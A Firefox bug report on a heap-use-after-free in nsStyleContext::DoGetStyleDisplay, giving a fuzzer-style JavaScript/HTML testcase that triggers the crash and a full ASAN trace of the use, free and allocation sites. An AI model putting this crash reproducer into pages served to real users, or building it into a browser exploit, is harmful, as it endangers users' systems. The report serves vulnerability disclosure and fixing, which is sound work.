1404589 - heap-use-after-free in nsStyleContext::DoGetStyleDisplay

Status: RESOLVED DUPLICATE of bug 1406750

(Core :: Layout, defect, P2)

Description

[Nils]

Attachment: ASAN output

heap-use-after-free in nsStyleContext::DoGetStyleDisplay

The following testcase crashes the latest ASAN build of Firefox (BuildID=20170929214740). It requires the attached div.html in the same directory.

<script>
function start() {
	o0=document.createElement('iframe');
	o0.src='div.html';
	o0.addEventListener('load', fun0,false);
	document.body.appendChild(o0);
	o1=window.document;
	o2=document.documentElement;
	window.top.setTimeout(fun1, 400);
}
function fun0() {
	o4=o0.contentDocument;
	o5=o4.getElementsByTagName('*')[4];
}
function fun1() {
	o5.innerHTML="'</rp><hgroup><em colspan><marquee target></address><style>::first-line {";
	o0.contentWindow.onresize=fun2;
	o0.height='-1px';
}
function fun2() {
	o1.designMode='on';
	o1.execCommand('justifyfull',false,null);
	document.documentElement.appendChild(o5);
	window.top.setTimeout("location.reload()",400);
}
</script>
<body onload="start()"></body>


ASAN output:
=================================================================
==17027==ERROR: AddressSanitizer: heap-use-after-free on address 0x61200006eed0 at pc 0x7f7138bd0d89 bp 0x7fffd13d65a0 sp 0x7fffd13d6598
READ of size 8 at 0x61200006eed0 thread T0 (file:// Content)
    #0 0x7f7138bd0d88 in IsServo /builds/worker/workspace/build/src/obj-firefox/dist/include/nsStyleContext.h:58:34
    #1 0x7f7138bd0d88 in IsGecko /builds/worker/workspace/build/src/obj-firefox/dist/include/nsStyleContext.h:57
    #2 0x7f7138bd0d88 in GetAsGecko /builds/worker/workspace/build/src/obj-firefox/dist/include/nsStyleContextInlines.h:23
    #3 0x7f7138bd0d88 in nsStyleDisplay const* nsStyleContext::DoGetStyleDisplay<true>() /builds/worker/workspace/build/src/obj-firefox/dist/include/nsStyleStructList.h:100
    #4 0x7f713da6c379 in StyleDisplay /builds/worker/workspace/build/src/obj-firefox/dist/include/nsStyleStructList.h:100:1
    #5 0x7f713da6c379 in StyleDisplay /builds/worker/workspace/build/src/obj-firefox/dist/include/nsStyleStructList.h:100
    #6 0x7f713da6c379 in nsIFrame::GetUsedBorder() const /builds/worker/workspace/build/src/layout/generic/nsFrame.cpp:1172
    #7 0x7f713d9c5997 in GetUsedBorderAndPadding /builds/worker/workspace/build/src/layout/generic/nsIFrame.h:1306:12
    #8 0x7f713d9c5997 in GetContentRectRelativeToSelf /builds/worker/workspace/build/src/layout/generic/nsFrame.cpp:1443
    #9 0x7f713d9c5997 in nsIFrame::GetContentRect() const /builds/worker/workspace/build/src/layout/generic/nsFrame.cpp:1453
    #10 0x7f713d54b53a in nsComputedDOMStyle::DoGetWidth() /builds/worker/workspace/build/src/layout/style/nsComputedDOMStyle.cpp:5215:35
    #11 0x7f713d51a883 in nsComputedDOMStyle::GetPropertyCSSValue(nsTSubstring<char16_t> const&, mozilla::ErrorResult&) /builds/worker/workspace/build/src/layout/style/nsComputedDOMStyle.cpp:1137:11
    #12 0x7f713d5180f8 in nsComputedDOMStyle::GetPropertyValue(nsTSubstring<char16_t> const&, nsTSubstring<char16_t>&) /builds/worker/workspace/build/src/layout/style/nsComputedDOMStyle.cpp:449:26
    #13 0x7f713d517f03 in nsComputedDOMStyle::GetPropertyValue(nsCSSPropertyID, nsTSubstring<char16_t>&) /builds/worker/workspace/build/src/layout/style/nsComputedDOMStyle.cpp:385:10
    #14 0x7f7139be76d2 in GetWidth /builds/worker/workspace/build/src/layout/style/nsCSSPropList.h:4450:1
    #15 0x7f7139be76d2 in mozilla::dom::CSS2PropertiesBinding::get_width(JSContext*, JS::Handle<JSObject*>, nsDOMCSSDeclaration*, JSJitGetterCallArgs) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/CSS2PropertiesBinding.cpp:44432
    #16 0x7f713b2140c6 in mozilla::dom::GenericBindingGetter(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2922:13
    #17 0x7f714165e104 in CallJSNative /builds/worker/workspace/build/src/js/src/jscntxtinlines.h:293:15
    #18 0x7f714165e104 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:495
    #19 0x7f714165ebf2 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:559:10
    #20 0x7f71420a025b in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/jsapi.cpp:2965:12
    #21 0x7f7137fe8794 in Call /builds/worker/workspace/build/src/obj-firefox/dist/include/jsapi.h:3556:12
    #22 0x7f7137fe8794 in xpc::XrayWrapper<js::CrossCompartmentWrapper, xpc::DOMXrayTraits>::get(JSContext*, JS::Handle<JSObject*>, JS::Handle<JS::Value>, JS::Handle<jsid>, JS::MutableHandle<JS::Value>) const /builds/worker/workspace/build/src/js/xpconnect/wrappers/XrayWrapper.cpp:2308
    #23 0x7f7142332560 in getInternal /builds/worker/workspace/build/src/js/src/proxy/Proxy.cpp:353:21
    #24 0x7f7142332560 in js::Proxy::get(JSContext*, JS::Handle<JSObject*>, JS::Handle<JS::Value>, JS::Handle<jsid>, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/proxy/Proxy.cpp:363
    #25 0x7f7142332801 in GetProperty /builds/worker/workspace/build/src/js/src/vm/NativeObject.h:1599:16
    #26 0x7f7142332801 in getInternal /builds/worker/workspace/build/src/js/src/proxy/Proxy.cpp:349
    #27 0x7f7142332801 in js::Proxy::get(JSContext*, JS::Handle<JSObject*>, JS::Handle<JS::Value>, JS::Handle<jsid>, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/proxy/Proxy.cpp:363
    #28 0x7f714166851b in GetProperty /builds/worker/workspace/build/src/js/src/vm/NativeObject.h:1599:16
    #29 0x7f714166851b in GetProperty /builds/worker/workspace/build/src/js/src/jsobj.h:813
    #30 0x7f714166851b in js::GetProperty(JSContext*, JS::Handle<JS::Value>, JS::Handle<js::PropertyName*>, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:4426
    #31 0x7f714164ae20 in GetPropertyOperation /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:218:12
    #32 0x7f714164ae20 in Interpret(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2803
    #33 0x7f714162f329 in js::RunScript(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:435:12
    #34 0x7f714165e29c in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:513:15
    #35 0x7f714165ebf2 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:559:10
    #36 0x7f714209e3d3 in JS_CallFunctionValue(JSContext*, JS::Handle<JSObject*>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/jsapi.cpp:2906:12
    #37 0x7f713cb905b6 in Call /builds/worker/workspace/build/src/obj-firefox/dist/include/jsapi.h:3536:14
    #38 0x7f713cb905b6 in nsXBLProtoImplAnonymousMethod::Execute(nsIContent*, JSAddonId*) /builds/worker/workspace/build/src/dom/xbl/nsXBLProtoImplMethod.cpp:331
    #39 0x7f713cb59c1e in nsXBLBinding::ExecuteAttachedHandler() /builds/worker/workspace/build/src/dom/xbl/nsXBLBinding.cpp:625:19
    #40 0x7f713cb59a2c in nsBindingManager::ProcessAttachedQueueInternal(unsigned int) /builds/worker/workspace/build/src/dom/xbl/nsBindingManager.cpp:433:16
    #41 0x7f713d7c5a7e in ProcessAttachedQueue /builds/worker/workspace/build/src/dom/xbl/nsBindingManager.h:105:5
    #42 0x7f713d7c5a7e in mozilla::PresShell::DoFlushPendingNotifications(mozilla::ChangesToFlush) /builds/worker/workspace/build/src/layout/base/PresShell.cpp:4153
    #43 0x7f713d73a560 in FlushPendingNotifications /builds/worker/workspace/build/src/obj-firefox/dist/include/nsIPresShell.h:566:5
    #44 0x7f713d73a560 in nsRefreshDriver::Tick(long, mozilla::TimeStamp) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:1921
    #45 0x7f713d74820b in TickDriver /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:337:13
    #46 0x7f713d74820b in mozilla::RefreshDriverTimer::TickRefreshDrivers(long, mozilla::TimeStamp, nsTArray<RefPtr<nsRefreshDriver> >&) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:307
    #47 0x7f713d747f06 in mozilla::RefreshDriverTimer::Tick(long, mozilla::TimeStamp) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:329:5
    #48 0x7f713d74a45b in RunRefreshDrivers /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:770:5
    #49 0x7f713d74a45b in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::TickRefreshDriver(mozilla::TimeStamp) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:683
    #50 0x7f713d74a066 in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::NotifyVsync(mozilla::TimeStamp) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:584:9
    #51 0x7f713df823d2 in mozilla::layout::VsyncChild::RecvNotify(mozilla::TimeStamp const&) /builds/worker/workspace/build/src/layout/ipc/VsyncChild.cpp:67:16
    #52 0x7f7137b7cabc in mozilla::layout::PVsyncChild::OnMessageReceived(IPC::Message const&) /builds/worker/workspace/build/src/obj-firefox/ipc/ipdl/PVsyncChild.cpp:155:20
    #53 0x7f71377ea03e in mozilla::ipc::PBackgroundChild::OnMessageReceived(IPC::Message const&) /builds/worker/workspace/build/src/obj-firefox/ipc/ipdl/PBackgroundChild.cpp:1695:28
    #54 0x7f7137737539 in mozilla::ipc::MessageChannel::DispatchAsyncMessage(IPC::Message const&) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:2119:25
    #55 0x7f713773454f in mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message&&) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:2049:17
    #56 0x7f7137735c84 in mozilla::ipc::MessageChannel::RunMessage(mozilla::ipc::MessageChannel::MessageTask&) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1895:5
    #57 0x7f71377362d8 in mozilla::ipc::MessageChannel::MessageTask::Run() /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1928:15
    #58 0x7f7136995392 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1039:14
    #59 0x7f71369af068 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:524:10
    #60 0x7f713773f1a6 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:125:5
    #61 0x7f71376a151b in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
    #62 0x7f71376a151b in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
    #63 0x7f71376a151b in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
    #64 0x7f713d05aaaf in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:158:27
    #65 0x7f71413aed87 in XRE_RunAppShell() /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:880:22
    #66 0x7f71376a151b in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
    #67 0x7f71376a151b in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
    #68 0x7f71376a151b in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
    #69 0x7f71413ae73a in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:705:34
    #70 0x4ec1e3 in content_process_main /builds/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:63:30
    #71 0x4ec1e3 in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:280
    #72 0x7f7153f5782f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
    #73 0x41db38 in _start (/fuzzer3/firefox/firefox+0x41db38)

0x61200006eed0 is located 16 bytes inside of 264-byte region [0x61200006eec0,0x61200006efc8)
freed by thread T0 (file:// Content) here:
    #0 0x4bc06b in __interceptor_free /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:47:3
    #1 0x7f7143276902 in servo_arc::{{impl}}::drop<style::gecko_properties::ComputedValues> /builds/worker/workspace/build/src/servo/components/servo_arc/lib.rs:385
    #2 0x7f7143276902 in core::ptr::drop_in_place<servo_arc::Arc<style::gecko_properties::ComputedValues>> /checkout/src/libcore/ptr.rs:60
    #3 0x7f7143276902 in style::gecko::arc_types::Servo_StyleContext_Release::{{closure}} /builds/worker/workspace/build/src/servo/components/style/gecko/arc_types.rs:133
    #4 0x7f7143276902 in servo_arc::{{impl}}::with_arc<style::gecko_properties::ComputedValues,closure,()> /builds/worker/workspace/build/src/servo/components/servo_arc/lib.rs:923
    #5 0x7f7143276902 in Servo_StyleContext_Release /builds/worker/workspace/build/src/servo/components/style/gecko/arc_types.rs:132
    #6 0x7f713de39de5 in Release /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/ServoStyleContext.h:35:20
    #7 0x7f713de39de5 in Release /builds/worker/workspace/build/src/layout/style/nsStyleContextInlines.h:50
    #8 0x7f713de39de5 in Release /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:41
    #9 0x7f713de39de5 in Release /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:398
    #10 0x7f713de39de5 in ~RefPtr /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:79
    #11 0x7f713de39de5 in nsIFrame::~nsIFrame() /builds/worker/workspace/build/src/layout/generic/nsIFrame.h:580
    #12 0x7f713da0f7e2 in nsFrame::DestroyFrom(nsIFrame*) /builds/worker/workspace/build/src/layout/generic/nsFrame.cpp:822:9
    #13 0x7f713d9c3b89 in DestroyFramesFrom /builds/worker/workspace/build/src/layout/generic/nsFrameList.cpp:57:12
    #14 0x7f713d9c3b89 in nsContainerFrame::DestroyFrom(nsIFrame*) /builds/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:223
    #15 0x7f713d9c3b89 in DestroyFramesFrom /builds/worker/workspace/build/src/layout/generic/nsFrameList.cpp:57:12
    #16 0x7f713d9c3b89 in nsContainerFrame::DestroyFrom(nsIFrame*) /builds/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:223
    #17 0x7f713db89128 in nsLineBox::DeleteLineList(nsPresContext*, nsLineList&, nsIFrame*, nsFrameList*) /builds/worker/workspace/build/src/layout/generic/nsLineBox.cpp:401:14
    #18 0x7f713d9c304a in nsBlockFrame::DestroyFrom(nsIFrame*) /builds/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:331:3
    #19 0x7f713db89128 in nsLineBox::DeleteLineList(nsPresContext*, nsLineList&, nsIFrame*, nsFrameList*) /builds/worker/workspace/build/src/layout/generic/nsLineBox.cpp:401:14
    #20 0x7f713d9c304a in nsBlockFrame::DestroyFrom(nsIFrame*) /builds/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:331:3
    #21 0x7f713db89128 in nsLineBox::DeleteLineList(nsPresContext*, nsLineList&, nsIFrame*, nsFrameList*) /builds/worker/workspace/build/src/layout/generic/nsLineBox.cpp:401:14
    #22 0x7f713d9c304a in nsBlockFrame::DestroyFrom(nsIFrame*) /builds/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:331:3
    #23 0x7f713db89128 in nsLineBox::DeleteLineList(nsPresContext*, nsLineList&, nsIFrame*, nsFrameList*) /builds/worker/workspace/build/src/layout/generic/nsLineBox.cpp:401:14
    #24 0x7f713d9c304a in nsBlockFrame::DestroyFrom(nsIFrame*) /builds/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:331:3
    #25 0x7f713db89128 in nsLineBox::DeleteLineList(nsPresContext*, nsLineList&, nsIFrame*, nsFrameList*) /builds/worker/workspace/build/src/layout/generic/nsLineBox.cpp:401:14
    #26 0x7f713d9c304a in nsBlockFrame::DestroyFrom(nsIFrame*) /builds/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:331:3
    #27 0x7f713d9c3b89 in DestroyFramesFrom /builds/worker/workspace/build/src/layout/generic/nsFrameList.cpp:57:12
    #28 0x7f713d9c3b89 in nsContainerFrame::DestroyFrom(nsIFrame*) /builds/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:223
    #29 0x7f713da1fd93 in nsCanvasFrame::DestroyFrom(nsIFrame*) /builds/worker/workspace/build/src/layout/generic/nsCanvasFrame.cpp:158:21
    #30 0x7f713d9c3b89 in DestroyFramesFrom /builds/worker/workspace/build/src/layout/generic/nsFrameList.cpp:57:12
    #31 0x7f713d9c3b89 in nsContainerFrame::DestroyFrom(nsIFrame*) /builds/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:223
    #32 0x7f713d9c3b89 in DestroyFramesFrom /builds/worker/workspace/build/src/layout/generic/nsFrameList.cpp:57:12
    #33 0x7f713d9c3b89 in nsContainerFrame::DestroyFrom(nsIFrame*) /builds/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:223
    #34 0x7f713d87d274 in Destroy /builds/worker/workspace/build/src/layout/generic/nsIFrame.h:661:20
    #35 0x7f713d87d274 in nsFrameManager::Destroy() /builds/worker/workspace/build/src/layout/base/nsFrameManager.cpp:119
    #36 0x7f713d7a4e9b in mozilla::PresShell::Destroy() /builds/worker/workspace/build/src/layout/base/PresShell.cpp:1341:22
    #37 0x7f713d8adefc in nsDocumentViewer::DestroyPresShell() /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:4728:15
    #38 0x7f713d8a51f8 in nsDocumentViewer::Hide() /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:2262:3
    #39 0x7f7140841cc9 in SetVisibility /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:6612:9
    #40 0x7f7140841cc9 in non-virtual thunk to nsDocShell::SetVisibility(bool) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:6602
    #41 0x7f71397b1c8a in nsFrameLoader::Hide() /builds/worker/workspace/build/src/dom/base/nsFrameLoader.cpp:1452:12
    #42 0x7f713dc622bd in nsHideViewer::Run() /builds/worker/workspace/build/src/layout/generic/nsSubDocumentFrame.cpp:954:21
    #43 0x7f713930adbf in nsContentUtils::RemoveScriptBlocker() /builds/worker/workspace/build/src/dom/base/nsContentUtils.cpp:5645:15
    #44 0x7f71396f71d9 in nsDocument::EndUpdate(unsigned int) /builds/worker/workspace/build/src/dom/base/nsDocument.cpp:5332:3
    #45 0x7f713ba0c44c in nsHTMLDocument::EndUpdate(unsigned int) /builds/worker/workspace/build/src/dom/html/nsHTMLDocument.cpp:2507:15

previously allocated by thread T0 (file:// Content) here:
    #0 0x4bc3bc in malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:64:3
    #1 0x7f7143364b4a in alloc_system::imp::allocate /checkout/src/liballoc_system/lib.rs:90
    #2 0x7f7143364b4a in alloc_system::__rust_allocate /checkout/src/liballoc_system/lib.rs:44
    #3 0x7f7143364b4a in alloc::heap::allocate /checkout/src/liballoc/heap.rs:59
    #4 0x7f7143364b4a in alloc::heap::exchange_malloc /checkout/src/liballoc/heap.rs:154
    #5 0x7f7143364b4a in alloc::boxed::{{impl}}::new<servo_arc::ArcInner<style::gecko_properties::ComputedValues>> /checkout/src/liballoc/boxed.rs:239
    #6 0x7f7143364b4a in servo_arc::{{impl}}::new<style::gecko_properties::ComputedValues> /builds/worker/workspace/build/src/servo/components/servo_arc/lib.rs:183
    #7 0x7f7143364b4a in style::gecko_properties::{{impl}}::to_outer_helper /builds/worker/workspace/build/src/obj-firefox/toolkit/library/x86_64-unknown-linux-gnu/release/build/style-09e40357bfda57ca/out/gecko_properties.rs:452
    #8 0x7f7143364b4a in style::gecko_properties::{{impl}}::to_outer /builds/worker/workspace/build/src/obj-firefox/toolkit/library/x86_64-unknown-linux-gnu/release/build/style-09e40357bfda57ca/out/gecko_properties.rs:441
    #9 0x7f7143364b4a in style::gecko_properties::{{impl}}::new /builds/worker/workspace/build/src/obj-firefox/toolkit/library/x86_64-unknown-linux-gnu/release/build/style-09e40357bfda57ca/out/gecko_properties.rs:218
    #10 0x7f7143364b4a in style::properties::StyleBuilder::build::h942866922741e10d /builds/worker/workspace/build/src/obj-firefox/toolkit/library/x86_64-unknown-linux-gnu/release/build/style-09e40357bfda57ca/out/properties.rs:138399
    #11 0x7f7143358847 in style::properties::apply_declarations<closure,core::iter::FlatMap<style::rule_tree::SelfAndAncestors, core::iter::FilterMap<core::iter::Rev<style::properties::declaration_block::DeclarationImportanceIterator>, closure>, closure>> /builds/worker/workspace/build/src/obj-firefox/toolkit/library/x86_64-unknown-linux-gnu/release/build/style-09e40357bfda57ca/out/properties.rs:139904
    #12 0x7f7143358847 in style::properties::cascade::h1feec7516dfe98fb /builds/worker/workspace/build/src/obj-firefox/toolkit/library/x86_64-unknown-linux-gnu/release/build/style-09e40357bfda57ca/out/properties.rs:139484
    #13 0x7f714341bcac in style::stylist::Stylist::compute_style_with_inputs::ha1cd7ecde12a429a /builds/worker/workspace/build/src/servo/components/style/stylist.rs:950
    #14 0x7f71430a4835 in Servo_ReparentStyle /builds/worker/workspace/build/src/servo/ports/geckolib/glue.rs:3241
    #15 0x7f713d450fc7 in mozilla::ServoStyleSet::ReparentStyleContext(mozilla::ServoStyleContext*, mozilla::ServoStyleContext*, mozilla::ServoStyleContext*, mozilla::ServoStyleContext*, mozilla::dom::Element*) /builds/worker/workspace/build/src/layout/style/ServoStyleSet.cpp:1569:10
    #16 0x7f713d8084af in mozilla::ServoRestyleManager::DoReparentStyleContext(nsIFrame*, mozilla::ServoStyleSet&) /builds/worker/workspace/build/src/layout/base/ServoRestyleManager.cpp:1573:15
    #17 0x7f713d808afc in mozilla::ServoRestyleManager::ReparentFrameDescendants(nsIFrame*, nsIFrame*, mozilla::ServoStyleSet&) /builds/worker/workspace/build/src/layout/base/ServoRestyleManager.cpp:1628:9
    #18 0x7f713d8086e2 in mozilla::ServoRestyleManager::DoReparentStyleContext(nsIFrame*, mozilla::ServoStyleSet&) /builds/worker/workspace/build/src/layout/base/ServoRestyleManager.cpp:1611:3
    #19 0x7f713d804981 in mozilla::ServoRestyleManager::ReparentStyleContext(nsIFrame*) /builds/worker/workspace/build/src/layout/base/ServoRestyleManager.cpp:1449:3
    #20 0x7f713d886799 in ReparentStyleContext /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RestyleManagerInlines.h:79:3
    #21 0x7f713d886799 in ReparentFrame /builds/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:505
    #22 0x7f713d886799 in ReparentFrames /builds/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:517
    #23 0x7f713d886799 in nsCSSFrameConstructor::WrapFramesInFirstLineFrame(nsFrameConstructorState&, nsIContent*, nsContainerFrame*, nsFirstLineFrame*, nsFrameItems&) /builds/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:11501
    #24 0x7f713d841426 in nsCSSFrameConstructor::ProcessChildren(nsFrameConstructorState&, nsIContent*, nsStyleContext*, nsContainerFrame*, bool, nsFrameItems&, bool, PendingBinding*, nsIFrame*) /builds/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:11379:5
    #25 0x7f713d84ba72 in nsCSSFrameConstructor::ConstructBlock(nsFrameConstructorState&, nsIContent*, nsContainerFrame*, nsContainerFrame*, nsStyleContext*, nsContainerFrame**, nsFrameItems&, nsIFrame*, PendingBinding*) /builds/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:12452:3
    #26 0x7f713d8538a4 in nsCSSFrameConstructor::ConstructNonScrollableBlockWithConstructor(nsFrameConstructorState&, nsCSSFrameConstructor::FrameConstructionItem&, nsContainerFrame*, nsStyleDisplay const*, nsFrameItems&, nsBlockFrame* (*)(nsIPresShell*, nsStyleContext*)) /builds/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:5104:3
    #27 0x7f713d85acc7 in nsCSSFrameConstructor::ConstructNonScrollableBlock(nsFrameConstructorState&, nsCSSFrameConstructor::FrameConstructionItem&, nsContainerFrame*, nsStyleDisplay const*, nsFrameItems&) /builds/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:5068:10
    #28 0x7f713d85651c in nsCSSFrameConstructor::ConstructFrameFromItemInternal(nsCSSFrameConstructor::FrameConstructionItem&, nsFrameConstructorState&, nsContainerFrame*, nsFrameItems&) /builds/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:4015:7
    #29 0x7f713d862a30 in nsCSSFrameConstructor::ConstructFramesFromItem(nsFrameConstructorState&, nsCSSFrameConstructor::FrameConstructionItemList::Iterator&, nsContainerFrame*, nsFrameItems&) /builds/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:6406:3
    #30 0x7f713d841376 in ConstructFramesFromItemList /builds/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:11054:5
    #31 0x7f713d841376 in nsCSSFrameConstructor::ProcessChildren(nsFrameConstructorState&, nsIContent*, nsStyleContext*, nsContainerFrame*, bool, nsFrameItems&, bool, PendingBinding*, nsIFrame*) /builds/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:11368
    #32 0x7f713d84ba72 in nsCSSFrameConstructor::ConstructBlock(nsFrameConstructorState&, nsIContent*, nsContainerFrame*, nsContainerFrame*, nsStyleContext*, nsContainerFrame**, nsFrameItems&, nsIFrame*, PendingBinding*) /builds/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:12452:3
    #33 0x7f713d8538a4 in nsCSSFrameConstructor::ConstructNonScrollableBlockWithConstructor(nsFrameConstructorState&, nsCSSFrameConstructor::FrameConstructionItem&, nsContainerFrame*, nsStyleDisplay const*, nsFrameItems&, nsBlockFrame* (*)(nsIPresShell*, nsStyleContext*)) /builds/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:5104:3
    #34 0x7f713d85acc7 in nsCSSFrameConstructor::ConstructNonScrollableBlock(nsFrameConstructorState&, nsCSSFrameConstructor::FrameConstructionItem&, nsContainerFrame*, nsStyleDisplay const*, nsFrameItems&) /builds/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:5068:10
    #35 0x7f713d85651c in nsCSSFrameConstructor::ConstructFrameFromItemInternal(nsCSSFrameConstructor::FrameConstructionItem&, nsFrameConstructorState&, nsContainerFrame*, nsFrameItems&) /builds/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:4015:7
    #36 0x7f713d862a30 in nsCSSFrameConstructor::ConstructFramesFromItem(nsFrameConstructorState&, nsCSSFrameConstructor::FrameConstructionItemList::Iterator&, nsContainerFrame*, nsFrameItems&) /builds/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:6406:3
    #37 0x7f713d841376 in ConstructFramesFromItemList /builds/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:11054:5
    #38 0x7f713d841376 in nsCSSFrameConstructor::ProcessChildren(nsFrameConstructorState&, nsIContent*, nsStyleContext*, nsContainerFrame*, bool, nsFrameItems&, bool, PendingBinding*, nsIFrame*) /builds/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:11368
    #39 0x7f713d84ba72 in nsCSSFrameConstructor::ConstructBlock(nsFrameConstructorState&, nsIContent*, nsContainerFrame*, nsContainerFrame*, nsStyleContext*, nsContainerFrame**, nsFrameItems&, nsIFrame*, PendingBinding*) /builds/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:12452:3
    #40 0x7f713d8538a4 in nsCSSFrameConstructor::ConstructNonScrollableBlockWithConstructor(nsFrameConstructorState&, nsCSSFrameConstructor::FrameConstructionItem&, nsContainerFrame*, nsStyleDisplay const*, nsFrameItems&, nsBlockFrame* (*)(nsIPresShell*, nsStyleContext*)) /builds/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:5104:3
    #41 0x7f713d85acc7 in nsCSSFrameConstructor::ConstructNonScrollableBlock(nsFrameConstructorState&, nsCSSFrameConstructor::FrameConstructionItem&, nsContainerFrame*, nsStyleDisplay const*, nsFrameItems&) /builds/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:5068:10
    #42 0x7f713d85651c in nsCSSFrameConstructor::ConstructFrameFromItemInternal(nsCSSFrameConstructor::FrameConstructionItem&, nsFrameConstructorState&, nsContainerFrame*, nsFrameItems&) /builds/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:4015:7
